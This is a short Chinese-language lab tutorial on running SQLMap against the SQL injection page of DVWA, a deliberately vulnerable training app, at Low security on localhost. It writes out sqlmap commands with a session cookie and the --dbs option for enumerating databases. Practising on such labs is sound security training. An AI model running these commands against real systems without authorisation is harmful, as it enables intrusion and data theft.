SQLMap 注入 DVWA实战
SQLMap & DVWA Low等级
测试对象:DVWA漏洞系统
防御等级:Low
防御等级描述:低-此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。
工具:SQLMap
本机URL:点击这里
开始
首先在这个页面上点击Submit
可以得到下面的链接
首先可以把这个链接直接用SQLMap的方式进行爆破
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
根据得到的结果,如图所示
我们可以看到需要跳转到login的页面,所以,认为这里是需要cookie的,所以,在这里我们查看cookie后,可以加上最需要的部分。(这里的phpstorm和Webstrom应该是IDE造成的,我们进行注入是不需要这些的)
在命令行输入以下代码:
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=v1d47lav6lot63v45vif84lren;security=low"
如果不想输入过多的Y/N可以在最后加上 -batch
但是这样是不推荐的,因为你可能会因此错过什么。
查看数据库的话 在最后加上 --dbs就可以